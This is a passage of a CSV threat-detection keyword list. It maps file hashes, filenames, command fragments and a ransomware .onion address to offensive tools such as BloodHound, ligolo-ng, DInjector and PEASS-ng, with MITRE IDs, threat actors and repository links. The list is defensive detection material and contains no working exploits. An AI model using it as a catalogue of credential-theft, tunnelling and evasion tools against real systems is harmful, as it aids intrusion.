branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40836" "*dfbc5037fe0229e15f6f15775117aef5*",".{0,1000}dfbc5037fe0229e15f6f15775117aef5.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","40837" "*dfbff267e7b977012d3425c75caf46618b734284b26e9aab45cd5234e5f27240*",".{0,1000}dfbff267e7b977012d3425c75caf46618b734284b26e9aab45cd5234e5f27240.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40838" "*dfce96a8631d54b7db3f4c222417d94fa131b7704c32cd431cdf6e04a945c1b2*",".{0,1000}dfce96a8631d54b7db3f4c222417d94fa131b7704c32cd431cdf6e04a945c1b2.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","40840" "*dfd2e8d943aab32e5988a886e6ed0a3bb36b5f5c3959fa3fb1281b6f524b16bb*",".{0,1000}dfd2e8d943aab32e5988a886e6ed0a3bb36b5f5c3959fa3fb1281b6f524b16bb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40842" "*dfd462f0bce767096991d29d5f12e4e3230d63020da7dd0a56592ad96d1ddd58*",".{0,1000}dfd462f0bce767096991d29d5f12e4e3230d63020da7dd0a56592ad96d1ddd58.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40843" "*dfd9cfda010ae5c691fb4e5beb2d4dc409674852a0181c4d8c0a8ed5675ee226*",".{0,1000}dfd9cfda010ae5c691fb4e5beb2d4dc409674852a0181c4d8c0a8ed5675ee226.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40845" "*dfdb8a1bfa8b93e9c81e8682c57ad011d477ef756de6a97151415059b81f6270*",".{0,1000}dfdb8a1bfa8b93e9c81e8682c57ad011d477ef756de6a97151415059b81f6270.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","40846" "*dfeb2fa81380c29962c017cdb719bbcaf2aaca68b64001f2e242c75a46aa509f*",".{0,1000}dfeb2fa81380c29962c017cdb719bbcaf2aaca68b64001f2e242c75a46aa509f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40848" "*dff115f0040f56de9d8a11cbdd37e10d55ab03005f13dba0c3b35f66f17cb517*",".{0,1000}dff115f0040f56de9d8a11cbdd37e10d55ab03005f13dba0c3b35f66f17cb517.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40850" "*dff6778fd8f6791258e502599e48da824a019c9c64aa13316ee27be174333a1b*",".{0,1000}dff6778fd8f6791258e502599e48da824a019c9c64aa13316ee27be174333a1b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40851" "*DFFE7691BAC94B487B52667CEA436719BCCE3E84D0B47BF8191B52C4FC50063E*",".{0,1000}DFFE7691BAC94B487B52667CEA436719BCCE3E84D0B47BF8191B52C4FC50063E.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","40855" "*dfscoerce.py -d *",".{0,1000}dfscoerce\.py\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - 
TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40857" "*dfscoerce.py*",".{0,1000}dfscoerce\.py.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","40858" "*dfscoerce_check*",".{0,1000}dfscoerce_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","40859" "*DFSCoerce-main*",".{0,1000}DFSCoerce\-main.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","0","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","40860" "*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*",".{0,1000}dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration 
simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40861" "*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*",".{0,1000}dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40862" "*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*",".{0,1000}dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ\-\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40863" "*dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk*",".{0,1000}dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","40864" "*dgnh6p5uq234zry7qx7bh73hj5ht3jqisgfet6s7j7uyas5i46xfdkyd.onion*",".{0,1000}dgnh6p5uq234zry7qx7bh73hj5ht3jqisgfet6s7j7uyas5i46xfdkyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40865" "*dhcp_sniffer.py*",".{0,1000}dhcp_sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40868" "*dhcp6.spoof.*",".{0,1000}dhcp6\.spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","40869" "*Dialup/VPN Password Recovery*",".{0,1000}Dialup\/VPN\sPassword\sRecovery.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40870" "*Dialup/VPN Passwords List*",".{0,1000}Dialup\/VPN\sPasswords\sList.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. 
and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40871" "*Dialupass.exe*",".{0,1000}Dialupass\.exe.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40872" "*Dialupass.zip*",".{0,1000}Dialupass\.zip.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. 
You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40873" "*Diamond RAT Builder.exe*",".{0,1000}Diamond\sRAT\sBuilder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40874" "*Dictionary brute force attack on SSH services*",".{0,1000}Dictionary\sbrute\sforce\sattack\son\sSSH\sservices.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","40875" "*dicts*generic-usernames.txt*",".{0,1000}dicts.{0,1000}generic\-usernames\.txt.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","40876" "*dicts/ftp_pswd.txt*",".{0,1000}dicts\/ftp_pswd\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","40877" "*dicts/ssh_default.txt*",".{0,1000}dicts\/ssh_default\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","40878" "*dicts/ssh_pswd.txt*",".{0,1000}dicts\/ssh_pswd\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","40879" "*diego-treitos/linux-smart-enumeration*",".{0,1000}diego\-treitos\/linux\-smart\-enumeration.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","40880" "*dievus/lnkbomb*",".{0,1000}dievus\/lnkbomb.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - 
TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","40881" "*dievus/PowerShellRunner*",".{0,1000}dievus\/PowerShellRunner.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","1","N/A","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","40882" "*digitalocean-droplet-openvpn-all.jar*",".{0,1000}digitalocean\-droplet\-openvpn\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","1","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","40886" "*DigitalOceanProxyTab$1.class*",".{0,1000}DigitalOceanProxyTab\$1\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","40887" "*DigitalSignature-Hijack.ps1*",".{0,1000}DigitalSignature\-Hijack\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 
- T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40888" "*Ding Ding Ding! Email opened!*",".{0,1000}Ding\sDing\sDing!\sEmail\sopened!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","40889" "*dinjector /i:* /p:*",".{0,1000}dinjector\s\/i\:.{0,1000}\s\/p\:.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","40890" "*DInjector.csproj*",".{0,1000}DInjector\.csproj.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","40891" "*DInjector.Detonator*",".{0,1000}DInjector\.Detonator.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","40892" "*DInjector.dll*",".{0,1000}DInjector\.dll.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","40893" "*DInjector/Dinjector*",".{0,1000}DInjector\/Dinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","40894" "*Dinjector-main*",".{0,1000}Dinjector\-main.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","40895" "*Dionach*PassHunt*",".{0,1000}Dionach.{0,1000}PassHunt.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. 
standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Discovery","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","N/A","1","63","30","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z","40896" "*Dionach.ShareAudit.Model.dll*",".{0,1000}Dionach\.ShareAudit\.Model\.dll.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","40897" "*Dionach.ShareAudit.Modules.Services.Interop.dll*",".{0,1000}Dionach\.ShareAudit\.Modules\.Services\.Interop\.dll.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","40898" "*dionach/ShareAudit*",".{0,1000}dionach\/ShareAudit.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","40899" "*dir /b/a %appdata%\Microsoft\Credentials\ 2>nul*",".{0,1000}dir\s\/b\/a\s\%appdata\%\\Microsoft\\Credentials\\\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40906" "*dir /b/a 
%localappdata%\Microsoft\Credentials\ 2>nul*",".{0,1000}dir\s\/b\/a\s\%localappdata\%\\Microsoft\\Credentials\\\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40908" "*dir_create2system.txt*",".{0,1000}dir_create2system\.txt.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40910" "*dirb *http* /usr/share/seclists/Discovery/Web-Content/big.txt*",".{0,1000}dirb\s.{0,1000}http.{0,1000}\s\/usr\/share\/seclists\/Discovery\/Web\-Content\/big\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40911" "*dirb/wordlists*",".{0,1000}dirb\/wordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40912" "*dircreate2system.cpp*",".{0,1000}dircreate2system\.cpp.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows 
Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40913" "*dircreate2system.exe*",".{0,1000}dircreate2system\.exe.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40914" "*dircreate2system.vcxproj*",".{0,1000}dircreate2system\.vcxproj.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40915" "*DirCreate2System-main*",".{0,1000}DirCreate2System\-main.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - 